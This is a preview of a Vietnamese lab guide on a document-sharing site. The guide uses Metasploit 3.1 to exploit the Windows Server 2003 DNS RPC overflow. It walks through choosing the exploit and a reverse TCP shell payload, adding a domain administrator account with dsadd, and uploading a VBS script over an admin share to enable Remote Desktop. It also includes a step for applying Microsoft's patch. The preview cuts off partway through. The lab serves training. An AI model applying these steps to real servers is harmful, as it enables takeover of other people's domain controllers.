Danh mục

Hướng dẫn cách dùng Meta Framework

Số trang: 30      Loại file: docx      Dung lượng: 1.71 MB      Lượt xem: 12      Lượt tải: 0    
Jamona

Phí tải xuống: 19,000 VND Tải xuống file đầy đủ (30 trang) 0
Xem trước 3 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

3.1,khai thác lỗi DNS Server của Windows Server 2003 SP1-SP2 (local có DNS hay domain controller đều gặp lỗi này) đểa.Tạo user và gán quyền quản trị hệ thống cho user này.b.Bật tính năng Remote Desktop cho máy domain từ xa2.Hướng dẫn cách download bản sửa lỗi này từ web site của Microsoft3.Bài lab bao gồm các bước
Nội dung trích xuất từ tài liệu:
Hướng dẫn cách dùng Meta Framework Giới thiệu :I. 1. Hướng dẫn cách dùng Meta Framework 3.1, khai thác lỗi DNS Server của Windows Server 2003 SP1-SP2 (local có DNS hay domain controller đều gặp lỗi này) để a. Tạo user và gán quyền quản trị hệ thống cho user này. b. Bật tính năng Remote Desktop cho máy domain từ xa 2. Hướng dẫn cách download bản sửa lỗi này từ web site của Microsoft 3. Bài lab bao gồm các bước : a. Install Framework-3.1.exe b. Dùng Framework 3.1 để khai thác lỗi của DNS server (trên máy domain)  chiếm được shell của domain c. Kết nối đến máy domain bằng shell này, đồng thời dùng command line tạo user và nâng quyền cho user này là thành viên của group Administrators d. Truy xuất đến máy domain bằng UNC để upload đoạn code Enable Remote Desktop e. Kết nối lại đến máy domain bằng shell để chạy đoạn code trên đồng thời remote desktop thử. f. Cập nhật bản sửa lỗi DNS Server trên máy domain, sau đó cho tấn công lại  không còn tấn công được nữa.II. Chuẩn bị : 2 máy 1. Máy domain controller hay 1 máy Windows Server 2003 local có DNS Server 2. Máy XP – dùng để khai thác lỗi DNS ServerIII. Thực hiện : 1. Trước khi tiến hành cài đặt framework trên máy XP, bạn cần kiểm tra chức năng Remote Desktop (trên máy domain) hiện nay chưa được bật lên và trong Active Directory Users and Computers không hề có bất kỳ user nào . 2. Qua máy XP, Install Framework-3.1.exe. Double click lên file chạy  NextMàn hình kế tiếp nhấn I AgreeMàn hình Choose Install Location  Next, sau đó nhấn InstallMàn hình kế tiếp nhấn InstallChờ trong khoảng thời gian 1 đến 2 phút, màn hình xuất hiện bảng thông báo,nhấn YesMàn hình Nmap setup xuất hiện, nhấn I AgreeTrong màn hình Choose Components , nhấn NextTrong màn hình Choose Install Location , nhấn Install … Sau đó nhấn CloseTrong màn hình Install Complete, nhấn NextTrong màn hình Create Shortcuts, nhấn CloseTrong màn hình Completing the Metasploit Framework 3.1 SetupWizard, nhấn FinishKhi đó chương trình sẽ start lên, chờ trong ít phút.Màn hình khởi động lên thành công sẽ như dưới đâyClick chuột lên vùng được khoanh dưới đây, gõ vào chữ DNS và Enter (hoặcnhấn Find). Chương trình sẽ tìm được 3 lỗi (bug) của DNS trên tất cả các hệđiều hành Windows. Double click lên dòng msdns_zonename Microsoft DNSRPC Service extractQuotedChar() Overflow (TCP)Màn hình Microsoft DNS RPC Service extractQuotedChar() Overflow(TCP) xuất hiện. Click phím mũi tên xuống, chọn dòng Windows 2003 ServerSP1-SP2 English. Nhấn ForwardTrong màn hình Select your payload, nhấn lên phím mũi tênChọn dòng Windows/shell/reverse_tcp, sau đó nhấn ForwardKhai báo địa chỉ IP của máy cần xâm nhập trong dòng RHOST và IP của máymình trong dòng LHOST. Các thông số khác thì giữ nguyên. Sau khi khai báoxong, nhấn ForwardNếu bạn làm đúng thì session của máy domain đã xuất hiện ở ô thứ 4 (ởgóc phải dưới màn hình)Nhấn phải chuột trên session vừa xuất hiện  chọn Interact Session Trong vòng 30s, bạn đã xâm nhập được máy domain. Màn hình dưới đây là màn hình của máy domain Bắt đầu tiến hành khai thác lỗi bằng cách tạo user từ command line3. Tại màn hình shell, bạn gõ lệnh : cd  Enter Tạo user trên domain: (gõ liên tục, không xuống hàng.Không phân biệt chữ in, chữ thường. Gõ thật chậm và chính xác vì muốn sửa trong đây, bạn phải thành thạo mới sửa được). Tạo user tên bao, có password là P@ssword, nằm trong Users, thuộc domain NHATNGHEOPENLAB.COM. User này sẽ được nâng quyền là thành viên của group Administrators. Gõ lệnh sau : Dsadd user CN=bao,CN=Users,DC=NHATNGHEOPENLAB,DC=COM – disabled no –pwd P@ssw0rd – memberof CN=Administrators,CN=Builtin,DC=NHATNGHEOPENLAB,DC=COM Nhấn Enter và xem kết quả phải như hình dưới đây Tạo 1 file tên Remote.vbs để upload lên máy domain Mở Windows Explorer  Nhấn phải chuột, chọn New  Textdocument  nhập vào tên file là Remote.vbs Nhấn phải chuột trên fiel Remote.vbs mới tạo  chọn Open with  Notepad Gõ vào đoạn code sau (được sưu tầm từ internet) Const ENABLE_CONNECTIONS = 1 strComputer = . Set objWMIService = GetObject(winmgmts: _ & {impersonationLevel=impersonate}\ & strComputer & ootcimv2) Set colItems = objWMIService.ExecQuery _ (Select * from Win32_TerminalServiceSetting) For Each objItem in colItems errResult = objItem.SetAllowTSConnections(ENABLE_CONNECTIONS) Next Đưa đoạn code này lên máy domain. Vào Run, gõ vào \192.168.168.100C$4. Trong khung thoại, nhập vào Username và Password đã tạo ở trên Drive C: của máy DC sẽ xuất hiện và bạn paste đoạn code trên vào folder Softs (hoặc là 1 fold ...

Tài liệu được xem nhiều: